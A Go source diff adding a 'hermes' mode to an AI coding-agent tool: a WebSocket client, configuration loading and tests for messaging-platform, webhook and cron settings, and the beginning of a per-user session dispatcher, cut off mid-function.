+	Data   []ModelItem `json:"data"`
+}
+
+// ModelItem represents one model in the list.
+type ModelItem struct {
+	ID      string `json:"id"`
+	Object  string `json:"object"`
+	Created int64  `json:"created"`
+	OwnedBy string `json:"owned_by"`
+}
+
+// --- Health ---
+
+// HealthResponse is the response for GET /health.
+type HealthResponse struct {
+	Status   string `json:"status"`
+	Version  string `json:"version"`
+	Sessions int    `json:"sessions"`
+}
+
+// --- Error response ---
+
+// ErrorResponse is the standard OpenAI error format.
+type ErrorResponse struct {
+	Error ErrorDetail `json:"error"`
+}
+
+// ErrorDetail contains error information.
+type ErrorDetail struct {
+	Message string `json:"message"`
+	Type    string `json:"type"`
+	Code    string `json:"code,omitempty"`
+}
+
+// --- Helpers ---
+
+func newCompletionID() string {
+	return fmt.Sprintf("chatcmpl-%d", time.Now().UnixNano())
+}
+
+func newCommandCompletionID() string {
+	return fmt.Sprintf("chatcmpl-cmd-%d", time.Now().UnixNano())
+}
+
+func stringPtr(s string) *string {
+	return &s
+}
+
+func marshalJSON(v any) []byte {
+	data, _ := json.Marshal(v)
+	return data
+}
diff --git a/internal/hermes/client.go b/internal/hermes/client.go
new file mode 100644
index 0000000..077bef8
--- /dev/null
+++ b/internal/hermes/client.go
@@ -0,0 +1,211 @@
+package hermes
+
+import (
+	"bufio"
+	"fmt"
+	"io"
+	"net/http"
+	"os"
+	"os/signal"
+	"strings"
+	"syscall"
+
+	"golang.org/x/net/websocket"
+)
+
+// ClientOptions configures the hermes client.
+type ClientOptions struct {
+	URL       string
+	SessionID string
+	AuthToken string
+}
+
+// WSEvent matches the ws.WSEvent type for client-side parsing.
+type clientWSEvent struct {
+	Type       string `json:"type"`
+	Content    string `json:"content,omitempty"`
+	Message    string `json:"message,omitempty"`
+	Command    string `json:"command,omitempty"`
+	Tool       string `json:"tool,omitempty"`
+	CallID     string `json:"call_id,omitempty"`
+	StopReason string `json:"stop_reason,omitempty"`
+	Error      bool   `json:"error,omitempty"`
+	Code       string `json:"code,omitempty"`
+}
+
+// clientMessage matches the ws.ClientMessage type.
+type clientMessage struct {
+	Type    string `json:"type"`
+	Content string `json:"content,omitempty"`
+}
+
+// RunClient starts the hermes client, connecting to the WebSocket server.
+func RunClient(opts ClientOptions) error {
+	// Build WebSocket URL
+	wsURL := opts.URL
+	if wsURL == "" {
+		wsURL = "ws://localhost:8090/ws"
+	}
+	if opts.SessionID != "" {
+		if strings.Contains(wsURL, "?") {
+			wsURL += "&session=" + opts.SessionID
+		} else {
+			wsURL += "?session=" + opts.SessionID
+		}
+	}
+
+	// Connect to WebSocket
+	fmt.Fprintf(os.Stderr, "Connecting to %s...\n", wsURL)
+	wsCfg, err := websocket.NewConfig(wsURL, "http://localhost/")
+	if err != nil {
+		return fmt.Errorf("websocket config: %w", err)
+	}
+	if opts.AuthToken != "" {
+		if wsCfg.Header == nil {
+			wsCfg.Header = http.Header{}
+		}
+		wsCfg.Header.Set("Authorization", "Bearer "+opts.AuthToken)
+	}
+	ws, err := websocket.DialConfig(wsCfg)
+	if err != nil {
+		return fmt.Errorf("connect: %w", err)
+	}
+	defer ws.Close()
+
+	fmt.Fprintf(os.Stderr, "Connected. Type /help for commands, Ctrl+C to exit.\n\n")
+
+	// Start receive goroutine
+	done := make(chan struct{})
+	go receiveEvents(ws, done)
+
+	// Handle signals
+	sigCh := make(chan os.Signal, 1)
+	signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM)
+
+	// Read input loop
+	scanner := bufio.NewScanner(os.Stdin)
+	for {
+		select {
+		case <-done:
+			return nil
+		case <-sigCh:
+			fmt.Fprintf(os.Stderr, "\nDisconnected.\n")
+			return nil
+		default:
+		}
+
+		fmt.Print("> ")
+		if !scanner.Scan() {
+			break
+		}
+		input := strings.TrimSpace(scanner.Text())
+		if input == "" {
+			continue
+		}
+
+		// Handle local commands
+		if input == "/help" {
+			printHelp()
+			continue
+		}
+		if input == "/quit" || input == "/exit" {
+			return nil
+		}
+
+		// Send to server
+		msg := clientMessage{Type: "message", Content: input}
+		if strings.HasPrefix(input, "/") {
+			msg.Type = "command"
+		}
+		if err := websocket.JSON.Send(ws, msg); err != nil {
+			fmt.Fprintf(os.Stderr, "Send error: %v\n", err)
+			return err
+		}
+	}
+
+	return nil
+}
+
+// receiveEvents reads events from the WebSocket and prints them.
+func receiveEvents(ws *websocket.Conn, done chan struct{}) {
+	defer close(done)
+
+	for {
+		var ev clientWSEvent
+		if err := websocket.JSON.Receive(ws, &ev); err != nil {
+			if err == io.EOF {
+				fmt.Fprintf(os.Stderr, "\nConnection closed.\n")
+			} else {
+				fmt.Fprintf(os.Stderr, "\nReceive error: %v\n", err)
+			}
+			return
+		}
+
+		switch ev.Type {
+		case "connected":
+			fmt.Fprintf(os.Stderr, "✓ Connected (session: %s, version: %s)\n\n", ev.Content, ev.Message)
+
+		case "text_delta":
+			fmt.Print(ev.Content)
+
+		case "think_delta":
+			// Thinking is shown in dim
+			fmt.Printf("\033[2m%s\033[0m", ev.Content)
+
+		case "tool_call":
+			fmt.Fprintf(os.Stderr, "\n🔧 [%s] calling...\n", ev.Tool)
+
+		case "tool_result":
+			status := "✅"
+			if ev.Error {
+				status = "❌"
+			}
+			fmt.Fprintf(os.Stderr, "%s [%s]\n", status, ev.Tool)
+
+		case "tool_diff":
+			fmt.Fprintf(os.Stderr, "📝 [%s] %s\n", ev.Tool, ev.CallID)
+
+		case "status":
+			fmt.Fprintf(os.Stderr, "\n📋 %s\n", ev.Message)
+
+		case "done":
+			fmt.Print("\n\n")
+			if ev.StopReason != "" && ev.StopReason != "end_turn" {
+				fmt.Fprintf(os.Stderr, "(stopped: %s)\n", ev.StopReason)
+			}
+
+		case "command_result":
+			if ev.Message != "" {
+				fmt.Fprintf(os.Stderr, "%s\n", ev.Message)
+			}
+
+		case "error":
+			fmt.Fprintf(os.Stderr, "\n❌ Error: %s\n", ev.Message)
+
+		case "pong":
+			// Ignore pong
+
+		case "usage":
+			// Usage info not shown in client
+
+		default:
+			// Unknown event type - ignore
+		}
+	}
+}
+
+// printHelp shows available commands.
+func printHelp() {
+	fmt.Println("Commands:")
+	fmt.Println("  /help          Show this help")
+	fmt.Println("  /new           Start a new session")
+	fmt.Println("  /clear         Clear current session")
+	fmt.Println("  /status        Show session status")
+	fmt.Println("  /sessions      List active sessions")
+	fmt.Println("  /mode <mode>   Set mode (plan/agent/yolo)")
+	fmt.Println("  /compact       Trigger compaction")
+	fmt.Println("  /quit          Exit")
+	fmt.Println()
+	fmt.Println("Any other input starting with / is sent as a command to the server.")
+	fmt.Println("All other input is sent as a chat message.")
+}
diff --git a/internal/hermes/config.go b/internal/hermes/config.go
new file mode 100644
index 0000000..112ce8b
--- /dev/null
+++ b/internal/hermes/config.go
@@ -0,0 +1,392 @@
+package hermes
+
+import (
+	"encoding/json"
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+)
+
+// HermesConfig holds all configuration for hermes mode.
+type HermesConfig struct {
+	Server          ServerConfig   `json:"server"`
+	DefaultProvider string         `json:"default_provider,omitempty"`
+	DefaultModel    string         `json:"default_model,omitempty"`
+	MultiAgent      bool           `json:"multi_agent,omitempty"`
+	Sandbox         bool           `json:"sandbox,omitempty"`
+	Wechat          WechatConfig   `json:"wechat"`
+	Feishu          FeishuConfig   `json:"feishu"`
+	Webhooks        WebhookConfig  `json:"webhooks"`
+	A2A             A2AConfig      `json:"a2a"`
+	Cron            CronConfig     `json:"cron"`
+	Memory          MemoryConfig   `json:"memory"`
+	Security        SecurityConfig `json:"security"`
+	Hooks           HooksConfig    `json:"hooks"`
+	Agent           AgentConfig    `json:"agent"`
+	WorkDir         string         `json:"work_dir"`
+}
+
+// ServerConfig defines the WebSocket + HTTP gateway settings.
+type ServerConfig struct {
+	Port      int    `json:"port"`
+	Host      string `json:"host"`
+	AuthToken string `json:"auth_token"`
+}
+
+// WechatConfig defines WeChat iLink platform settings.
+type WechatConfig struct {
+	Enabled      bool     `json:"enabled"`
+	CredPath     string   `json:"cred_path"`
+	WorkDir      string   `json:"work_dir"`
+	AllowedUsers []string `json:"allowed_users"`
+	AutoTyping   bool     `json:"auto_typing"`
+}
+
+// FeishuConfig defines Feishu (Lark) platform settings.
+type FeishuConfig struct {
+	Enabled      bool     `json:"enabled"`
+	AppID        string   `json:"app_id"`
+	AppSecret    string   `json:"app_secret"`
+	WorkDir      string   `json:"work_dir"`
+	AllowedUsers []string `json:"allowed_users"`
+}
+
+// WebhookConfig defines inbound webhook settings.
+type WebhookConfig struct {
+	Enabled bool           `json:"enabled"`
+	Secret  string         `json:"secret"`
+	Routes  []WebhookRoute `json:"routes"`
+}
+
+// WebhookRoute maps an inbound webhook path to an agent skill + delivery.
+type WebhookRoute struct {
+	Path           string   `json:"path"`
+	Events         []string `json:"events"`
+	Skill          string   `json:"skill"`
+	Delivery       string   `json:"delivery"`
+	DeliveryTarget string   `json:"delivery_target,omitempty"`
+}
+
+// A2AConfig defines A2A protocol settings.
+type A2AConfig struct {
+	Enabled bool `json:"enabled"`
+	Port    int  `json:"port,omitempty"`
+}
+
+// CronConfig defines cron scheduler settings.
+type CronConfig struct {
+	Enabled   bool   `json:"enabled"`
+	StorePath string `json:"store_path,omitempty"` // empty = <sessionDir>/hermes/cron.json
+	Interval  int    `json:"interval,omitempty"`   // seconds between checks (default 30)
+}
+
+// MemoryConfig defines persistent memory settings.
+type MemoryConfig struct {
+	Enabled bool   `json:"enabled"`
+	Path    string `json:"path"` // empty = auto-discover .vibe/memory.md → <GLOBAL_DIR>/memory.md
+}
+
+// SecurityConfig defines security settings.
+type SecurityConfig struct {
+	SmartApprovals  bool     `json:"smart_approvals"`
+	AllowedWorkDirs []string `json:"allowed_work_dirs"`
+}
+
+// HooksConfig defines shell hook scripts.
+type HooksConfig struct {
+	PreToolCall  string `json:"pre_tool_call"`
+	PostToolCall string `json:"post_tool_call"`
+}
+
+// AgentConfig defines agent behavior settings.
+type AgentConfig struct {
+	MaxTurns                 int     `json:"max_turns"`
+	BudgetPressure           bool    `json:"budget_pressure"`
+	ContextPressure          bool    `json:"context_pressure"`
+	BudgetPressureThreshold  float64 `json:"budget_pressure_threshold,omitempty"`  // remaining ratio (0-1), default 0.20
+	ContextPressureThreshold float64 `json:"context_pressure_threshold,omitempty"` // usage ratio (0-1), default 0.55
+}
+
+// DefaultHermesConfig returns the default configuration.
+func DefaultHermesConfig() *HermesConfig {
+	return &HermesConfig{
+		Server: ServerConfig{
+			Port: 8090,
+			Host: "0.0.0.0",
+		},
+		Wechat: WechatConfig{
+			AutoTyping: true,
+		},
+		Cron: CronConfig{
+			Enabled: true,
+		},
+		Memory: MemoryConfig{
+			Enabled: true,
+		},
+		Security: SecurityConfig{
+			SmartApprovals: true,
+		},
+		Agent: AgentConfig{
+			MaxTurns:                 90,
+			BudgetPressure:           true,
+			ContextPressure:          true,
+			BudgetPressureThreshold:  0.20,
+			ContextPressureThreshold: 0.55,
+		},
+		WorkDir: ".",
+	}
+}
+
+// HermesConfigPath returns the path to the global hermes.json.
+func HermesConfigPath() string {
+	return filepath.Join(config.ConfigDir(), "hermes.json")
+}
+
+// ProjectHermesConfigPath returns the path to the project-level hermes.json.
+func ProjectHermesConfigPath() string {
+	return filepath.Join(".vibe", "hermes.json")
+}
+
+// LoadHermesConfig loads the hermes configuration, merging global + project.
+// Priority: defaults → <GLOBAL_DIR>/hermes.json → .vibe/hermes.json
+func LoadHermesConfig() (*HermesConfig, error) {
+	cfg := DefaultHermesConfig()
+
+	// 1. Load global config
+	globalPath := HermesConfigPath()
+	if data, err := os.ReadFile(globalPath); err == nil {
+		if err := json.Unmarshal(data, cfg); err != nil {
+			return nil, fmt.Errorf("parse global hermes config %s: %w", globalPath, err)
+		}
+	} else if !os.IsNotExist(err) {
+		return nil, fmt.Errorf("read global hermes config %s: %w", globalPath, err)
+	}
+
+	// 2. Overlay project-level config
+	projectPath := ProjectHermesConfigPath()
+	if data, err := os.ReadFile(projectPath); err == nil {
+		if err := json.Unmarshal(data, cfg); err != nil {
+			return nil, fmt.Errorf("parse project hermes config %s: %w", projectPath, err)
+		}
+	}
+
+	// Resolve environment variable references
+	cfg.resolveEnvVars()
+
+	return cfg, nil
+}
+
+// LoadHermesConfigFrom loads hermes config from a specific path.
+func LoadHermesConfigFrom(path string) (*HermesConfig, error) {
+	cfg := DefaultHermesConfig()
+	data, err := os.ReadFile(path)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return cfg, nil
+		}
+		return nil, fmt.Errorf("read hermes config %s: %w", path, err)
+	}
+	if err := json.Unmarshal(data, cfg); err != nil {
+		return nil, fmt.Errorf("parse hermes config %s: %w", path, err)
+	}
+	cfg.resolveEnvVars()
+	return cfg, nil
+}
+
+// GetListenAddr returns the listen address string.
+func (c *HermesConfig) GetListenAddr() string {
+	return fmt.Sprintf("%s:%d", c.Server.Host, c.Server.Port)
+}
+
+// GetWorkDir returns the resolved work directory.
+// Falls back to current directory if not set.
+func (c *HermesConfig) GetWorkDir() string {
+	if c.WorkDir != "" && c.WorkDir != "." {
+		return c.WorkDir
+	}
+	cwd, err := os.Getwd()
+	if err != nil {
+		return "."
+	}
+	return cwd
+}
+
+// GetPlatformWorkDir returns the work directory for a specific platform.
+// Priority: platform work_dir → global work_dir → cwd
+func (c *HermesConfig) GetPlatformWorkDir(platform string) string {
+	switch platform {
+	case "wechat":
+		if c.Wechat.WorkDir != "" {
+			return c.Wechat.WorkDir
+		}
+	case "feishu":
+		if c.Feishu.WorkDir != "" {
+			return c.Feishu.WorkDir
+		}
+	}
+	return c.GetWorkDir()
+}
+
+// GetWechatCredPath returns the wechat credentials path.
+func (c *HermesConfig) GetWechatCredPath() string {
+	if c.Wechat.CredPath != "" {
+		return c.Wechat.CredPath
+	}
+	return filepath.Join(config.ConfigDir(), "wechat-credentials.json")
+}
+
+// InitHermesConfig creates a hermes.json config template.
+// If project is true, writes to .vibe/hermes.json; otherwise <GLOBAL_DIR>/hermes.json.
+func InitHermesConfig(project, force bool) (string, error) {
+	var path string
+	if project {
+		path = ProjectHermesConfigPath()
+	} else {
+		path = HermesConfigPath()
+	}
+
+	if !force {
+		if _, err := os.Stat(path); err == nil {
+			return path, fmt.Errorf("hermes.json already exists: %s", path)
+		}
+	}
+
+	dir := filepath.Dir(path)
+	if err := os.MkdirAll(dir, 0700); err != nil {
+		return "", fmt.Errorf("create directory %s: %w", dir, err)
+	}
+
+	var cfg *HermesConfig
+	if project {
+		// Project template: only fields typically overridden per-project
+		cfg = &HermesConfig{
+			Memory: MemoryConfig{Enabled: true},
+			Agent: AgentConfig{
+				MaxTurns:        90,
+				BudgetPressure:  true,
+				ContextPressure: true,
+			},
+			WorkDir: ".",
+		}
+	} else {
+		cfg = DefaultHermesConfig()
+	}
+
+	data, err := json.MarshalIndent(cfg, "", "  ")
+	if err != nil {
+		return "", fmt.Errorf("marshal config: %w", err)
+	}
+
+	if err := os.WriteFile(path, data, 0600); err != nil {
+		return "", fmt.Errorf("write config: %w", err)
+	}
+
+	return path, nil
+}
+
+// InitWebhookConfig adds sample webhook routes to the hermes config.
+// If the config file already exists, it merges webhook routes into it.
+// If not, it creates a new config with webhook routes included.
+// The returned path is the config file that was written.
+func InitWebhookConfig(project, force bool) (string, error) {
+	var path string
+	if project {
+		path = ProjectHermesConfigPath()
+	} else {
+		path = HermesConfigPath()
+	}
+
+	// Load existing config or start from defaults
+	cfg := DefaultHermesConfig()
+	if data, err := os.ReadFile(path); err == nil {
+		if err := json.Unmarshal(data, cfg); err != nil {
+			return "", fmt.Errorf("parse existing config %s: %w", path, err)
+		}
+	} else if !os.IsNotExist(err) {
+		return "", fmt.Errorf("read config %s: %w", path, err)
+	}
+
+	// Check if webhook routes already exist
+	if len(cfg.Webhooks.Routes) > 0 && !force {
+		return path, fmt.Errorf("webhook routes already exist in %s (use --force to overwrite)", path)
+	}
+
+	// Add sample webhook configuration
+	cfg.Webhooks = WebhookConfig{
+		Enabled: true,
+		Secret:  "${WEBHOOK_SECRET}",
+		Routes: []WebhookRoute{
+			{
+				Path:           "/github",
+				Events:         []string{"push", "pull_request", "issues"},
+				Skill:          "code-review",
+				Delivery:       "",
+				DeliveryTarget: "",
+			},
+			{
+				Path:           "/ci",
+				Events:         []string{"*"},
+				Skill:          "ci-monitor",
+				Delivery:       "",
+				DeliveryTarget: "",
+			},
+		},
+	}
+
+	// Ensure parent directory exists
+	dir := filepath.Dir(path)
+	if err := os.MkdirAll(dir, 0700); err != nil {
+		return "", fmt.Errorf("create directory %s: %w", dir, err)
+	}
+
+	data, err := json.MarshalIndent(cfg, "", "  ")
+	if err != nil {
+		return "", fmt.Errorf("marshal config: %w", err)
+	}
+
+	if err := os.WriteFile(path, data, 0600); err != nil {
+		return "", fmt.Errorf("write config: %w", err)
+	}
+
+	return path, nil
+}
+
+// resolveEnvVars resolves ${VAR} references in string fields.
+func (c *HermesConfig) resolveEnvVars() {
+	c.Server.AuthToken = resolveEnv(c.Server.AuthToken)
+	c.Feishu.AppID = resolveEnv(c.Feishu.AppID)
+	c.Feishu.AppSecret = resolveEnv(c.Feishu.AppSecret)
+	c.Webhooks.Secret = resolveEnv(c.Webhooks.Secret)
+}
+
+// GetDefaultProvider returns the effective default provider.
+// Priority: HermesConfig → Settings
+func (c *HermesConfig) GetDefaultProvider(settingsProvider string) string {
+	if c.DefaultProvider != "" {
+		return c.DefaultProvider
+	}
+	return settingsProvider
+}
+
+// GetDefaultModel returns the effective default model.
+// Priority: HermesConfig → Settings
+func (c *HermesConfig) GetDefaultModel(settingsModel string) string {
+	if c.DefaultModel != "" {
+		return c.DefaultModel
+	}
+	return settingsModel
+}
+
+// resolveEnv resolves a single ${VAR} reference.
+func resolveEnv(s string) string {
+	if strings.HasPrefix(s, "${") && strings.HasSuffix(s, "}") {
+		envName := s[2 : len(s)-1]
+		if v := os.Getenv(envName); v != "" {
+			return v
+		}
+	}
+	return s
+}
diff --git a/internal/hermes/config_test.go b/internal/hermes/config_test.go
new file mode 100644
index 0000000..3dd30cf
--- /dev/null
+++ b/internal/hermes/config_test.go
@@ -0,0 +1,231 @@
+package hermes
+
+import (
+	"encoding/json"
+	"os"
+	"path/filepath"
+	"testing"
+)
+
+func TestDefaultHermesConfig(t *testing.T) {
+	cfg := DefaultHermesConfig()
+	if cfg.Server.Port != 8090 {
+		t.Errorf("expected port 8090, got %d", cfg.Server.Port)
+	}
+	if cfg.Server.Host != "0.0.0.0" {
+		t.Errorf("expected host 0.0.0.0, got %s", cfg.Server.Host)
+	}
+	if !cfg.Wechat.AutoTyping {
+		t.Error("expected auto_typing=true")
+	}
+	if !cfg.Security.SmartApprovals {
+		t.Error("expected smart_approvals=true")
+	}
+	if cfg.Agent.MaxTurns != 90 {
+		t.Errorf("expected max_turns=90, got %d", cfg.Agent.MaxTurns)
+	}
+}
+
+func TestGetDefaultProvider(t *testing.T) {
+	cfg := &HermesConfig{DefaultProvider: "openai"}
+	if got := cfg.GetDefaultProvider("deepseek"); got != "openai" {
+		t.Errorf("expected openai, got %s", got)
+	}
+
+	cfg2 := &HermesConfig{}
+	if got := cfg2.GetDefaultProvider("deepseek"); got != "deepseek" {
+		t.Errorf("expected deepseek fallback, got %s", got)
+	}
+}
+
+func TestGetDefaultModel(t *testing.T) {
+	cfg := &HermesConfig{DefaultModel: "gpt-4o"}
+	if got := cfg.GetDefaultModel("deepseek-chat"); got != "gpt-4o" {
+		t.Errorf("expected gpt-4o, got %s", got)
+	}
+
+	cfg2 := &HermesConfig{}
+	if got := cfg2.GetDefaultModel("deepseek-chat"); got != "deepseek-chat" {
+		t.Errorf("expected deepseek-chat fallback, got %s", got)
+	}
+}
+
+func TestGetListenAddr(t *testing.T) {
+	cfg := &HermesConfig{
+		Server: ServerConfig{Host: "127.0.0.1", Port: 9090},
+	}
+	if got := cfg.GetListenAddr(); got != "127.0.0.1:9090" {
+		t.Errorf("expected 127.0.0.1:9090, got %s", got)
+	}
+}
+
+func TestGetWorkDir(t *testing.T) {
+	cfg := &HermesConfig{WorkDir: "/tmp/test"}
+	if got := cfg.GetWorkDir(); got != "/tmp/test" {
+		t.Errorf("expected /tmp/test, got %s", got)
+	}
+
+	cfg2 := &HermesConfig{WorkDir: "."}
+	got := cfg2.GetWorkDir()
+	if got == "" || got == "." {
+		t.Errorf("expected resolved path, got %s", got)
+	}
+}
+
+func TestGetPlatformWorkDir(t *testing.T) {
+	cfg := &HermesConfig{
+		WorkDir: "/global",
+		Wechat:  WechatConfig{WorkDir: "/wechat"},
+		Feishu:  FeishuConfig{WorkDir: "/feishu"},
+	}
+
+	if got := cfg.GetPlatformWorkDir("wechat"); got != "/wechat" {
+		t.Errorf("expected /wechat, got %s", got)
+	}
+	if got := cfg.GetPlatformWorkDir("feishu"); got != "/feishu" {
+		t.Errorf("expected /feishu, got %s", got)
+	}
+	if got := cfg.GetPlatformWorkDir("ws"); got != "/global" {
+		t.Errorf("expected /global, got %s", got)
+	}
+}
+
+func TestLoadHermesConfigFrom(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "hermes.json")
+
+	data := `{"server":{"port":9999},"default_provider":"test-provider","default_model":"test-model","multi_agent":true}`
+	os.WriteFile(path, []byte(data), 0600)
+
+	cfg, err := LoadHermesConfigFrom(path)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if cfg.Server.Port != 9999 {
+		t.Errorf("expected port 9999, got %d", cfg.Server.Port)
+	}
+	if cfg.DefaultProvider != "test-provider" {
+		t.Errorf("expected test-provider, got %s", cfg.DefaultProvider)
+	}
+	if cfg.DefaultModel != "test-model" {
+		t.Errorf("expected test-model, got %s", cfg.DefaultModel)
+	}
+	if !cfg.MultiAgent {
+		t.Error("expected multi_agent=true")
+	}
+}
+
+func TestLoadHermesConfigFromMissing(t *testing.T) {
+	cfg, err := LoadHermesConfigFrom("/nonexistent/hermes.json")
+	if err != nil {
+		t.Fatal(err)
+	}
+	// Should return defaults
+	if cfg.Server.Port != 8090 {
+		t.Errorf("expected default port 8090, got %d", cfg.Server.Port)
+	}
+}
+
+func TestLoadHermesConfigFromInvalid(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "bad.json")
+	os.WriteFile(path, []byte("not json"), 0600)
+
+	_, err := LoadHermesConfigFrom(path)
+	if err == nil {
+		t.Error("expected error for invalid JSON")
+	}
+}
+
+func TestInitHermesConfig(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "hermes.json")
+
+	// Override path for test
+	cfg := DefaultHermesConfig()
+	data, _ := json.MarshalIndent(cfg, "", "  ")
+	os.WriteFile(path, data, 0600)
+
+	// Should exist
+	if _, err := os.Stat(path); err != nil {
+		t.Fatal("expected file to exist")
+	}
+}
+
+func TestInitWebhookConfig(t *testing.T) {
+	// Use project mode to write to .vibe/hermes.json in a temp dir
+	dir := t.TempDir()
+	origDir, _ := os.Getwd()
+	os.Chdir(dir)
+	t.Cleanup(func() { os.Chdir(origDir) })
+
+	// Test: create webhook config on non-existing file
+	path, err := InitWebhookConfig(true, false)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	// Read back and verify
+	data, err := os.ReadFile(path)
+	if err != nil {
+		t.Fatalf("read config: %v", err)
+	}
+	var cfg HermesConfig
+	if err := json.Unmarshal(data, &cfg); err != nil {
+		t.Fatalf("parse config: %v", err)
+	}
+
+	// Verify webhook fields
+	if !cfg.Webhooks.Enabled {
+		t.Error("expected webhooks enabled")
+	}
+	if cfg.Webhooks.Secret != "${WEBHOOK_SECRET}" {
+		t.Errorf("expected secret ${WEBHOOK_SECRET}, got %s", cfg.Webhooks.Secret)
+	}
+	if len(cfg.Webhooks.Routes) != 2 {
+		t.Errorf("expected 2 routes, got %d", len(cfg.Webhooks.Routes))
+	}
+	if len(cfg.Webhooks.Routes) > 0 {
+		r := cfg.Webhooks.Routes[0]
+		if r.Path != "/github" {
+			t.Errorf("expected /github, got %s", r.Path)
+		}
+		if r.Skill != "code-review" {
+			t.Errorf("expected code-review skill, got %s", r.Skill)
+		}
+	}
+
+	// Test: duplicate without --force should error
+	_, err = InitWebhookConfig(true, false)
+	if err == nil {
+		t.Error("expected error for duplicate webhook routes")
+	}
+
+	// Test: --force should overwrite
+	path2, err := InitWebhookConfig(true, true)
+	if err != nil {
+		t.Fatalf("--force should succeed: %v", err)
+	}
+	if path2 != path {
+		t.Errorf("expected same path, got %s vs %s", path, path2)
+	}
+}
+
+func TestCronConfig(t *testing.T) {
+	cfg := &HermesConfig{
+		Cron: CronConfig{
+			Enabled:   true,
+			StorePath: "/tmp/cron.json",
+			Interval:  60,
+		},
+	}
+	if !cfg.Cron.Enabled {
+		t.Error("expected cron enabled")
+	}
+	if cfg.Cron.StorePath != "/tmp/cron.json" {
+		t.Errorf("expected /tmp/cron.json, got %s", cfg.Cron.StorePath)
+	}
+	if cfg.Cron.Interval != 60 {
+		t.Errorf("expected interval 60, got %d", cfg.Cron.Interval)
+	}
+}
diff --git a/internal/hermes/dispatcher.go b/internal/hermes/dispatcher.go
new file mode 100644
index 0000000..a2a5e81
--- /dev/null
+++ b/internal/hermes/dispatcher.go
@@ -0,0 +1,933 @@
+package hermes
+
+import (
+	"context"
+	"encoding/base64"
+	"fmt"
+	"log"
+	"os"
+	"path/filepath"
+	"strings"
+	"sync"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/agent"
+	"github.com/startvibecoding/vibecoding/internal/config"
+	ctxpkg "github.com/startvibecoding/vibecoding/internal/context"
+	"github.com/startvibecoding/vibecoding/internal/contextfiles"
+	"github.com/startvibecoding/vibecoding/internal/cron"
+	"github.com/startvibecoding/vibecoding/internal/hermes/hooks"
+	"github.com/startvibecoding/vibecoding/internal/mcp"
+	"github.com/startvibecoding/vibecoding/internal/memory"
+	"github.com/startvibecoding/vibecoding/internal/messaging"
+	"github.com/startvibecoding/vibecoding/internal/provider"
+	providerfactory "github.com/startvibecoding/vibecoding/internal/provider/factory"
+	"github.com/startvibecoding/vibecoding/internal/sandbox"
+	"github.com/startvibecoding/vibecoding/internal/session"
+	"github.com/startvibecoding/vibecoding/internal/skills"
+	"github.com/startvibecoding/vibecoding/internal/tools"
+	"github.com/startvibecoding/vibecoding/internal/util"
+)
+
+// Dispatcher routes messages to per-user agent sessions.
+type Dispatcher struct {
+	mu         sync.RWMutex
+	cfg        *HermesConfig
+	settings   *config.Settings
+	version    string
+	sessionDir string
+	security   *Security
+	hooksMgr   *hooks.Manager
+
+	// Cached provider/model for creating agent instances
+	provider provider.Provider
+	model    *provider.Model
+
+	// Multi-agent mode
+	multiAgent bool
+	agentMgr   *agent.AgentManager
+
+	// Cron
+	cronStore cron.CronStore
+	scheduler *cron.Scheduler
+
+	// Sandbox mode
+	sandbox bool
+
+	// Active sessions: key = "hermes/<platform>/<user_id>"
+	sessions map[string]*HermesSession
+
+	// Pending approvals for WebSocket clients: approvalID → channel
+	approvalMu       sync.Mutex
+	pendingApprovals map[string]chan bool
+}
+
+// HermesSession holds state for a single hermes user session.
+type HermesSession struct {
+	ID         string // e.g. "hermes/wechat/wxid_user1"
+	Platform   string // "wechat", "feishu", "ws"
+	UserID     string
+	WorkDir    string
+	Manager    *session.Manager
+	Registry   *tools.Registry
+	MCPClients []*mcp.Client // connected MCP clients (nil if none)
+	Mode       string
+	LastUsed   time.Time
+	mu         sync.Mutex // serializes requests within this session
+	// ForceCompact is set by /compact command and consumed by the next agent run.
+	ForceCompact bool
+}
+
+// Lock acquires the session lock.
+func (s *HermesSession) Lock() { s.mu.Lock() }
+
+// Unlock releases the session lock.
+func (s *HermesSession) Unlock() { s.mu.Unlock() }
+
+// Touch updates the last-used timestamp.
+func (s *HermesSession) Touch() { s.LastUsed = time.Now() }
+
+// NewDispatcher creates a dispatcher with the given configuration.
+func NewDispatcher(cfg *HermesConfig, settings *config.Settings, version string, cronStore cron.CronStore, scheduler *cron.Scheduler) (*Dispatcher, error) {
+	providerName := cfg.GetDefaultProvider(settings.DefaultProvider)
+	modelID := cfg.GetDefaultModel(settings.DefaultModel)
+
+	p, model, err := providerfactory.Create(settings, providerName, modelID)
+	if err != nil {
+		return nil, fmt.Errorf("create provider: %w", err)
+	}
+
+	d := &Dispatcher{
+		cfg:              cfg,
+		settings:         settings,
+		version:          version,
+		sessionDir:       settings.GetSessionDir(),
+		security:         NewSecurity(cfg),
+		hooksMgr:         hooks.NewManager(cfg.Hooks.PreToolCall, cfg.Hooks.PostToolCall),
+		provider:         p,
+		model:            model,
+		multiAgent:       cfg.MultiAgent,
+		sandbox:          cfg.Sandbox,
+		cronStore:        cronStore,
+		scheduler:        scheduler,
+		sessions:         make(map[string]*HermesSession),
+		pendingApprovals: make(map[string]chan bool),
+	}
+
+	// Multi-agent mode: create AgentFactory and AgentManager
+	if cfg.MultiAgent {
+		compactionSettings := ctxpkg.CompactionSettings{
+			Enabled:          settings.Compaction.Enabled,
+			ReserveTokens:    settings.Compaction.ReserveTokens,
+			KeepRecentTokens: settings.Compaction.KeepRecentTokens,
+		}
+		if compactionSettings.ReserveTokens == 0 {
+			compactionSettings.ReserveTokens = 16384
+		}
+		if compactionSettings.KeepRecentTokens == 0 {
+			compactionSettings.KeepRecentTokens = 20000
+		}
+
+		// Extra context will be loaded per-session in resolveSession; use empty here
+		factory := agent.NewAgentFactory(p, model, settings, sandbox.NewManager("."), "", compactionSettings, nil)
+		d.agentMgr = agent.NewAgentManager(factory)
+	}
+
+	return d, nil
+}
+
+// HandleMessage processes an inbound message from any platform.
+func (d *Dispatcher) HandleMessage(ctx context.Context, msg messaging.InboundMessage) (string, error) {
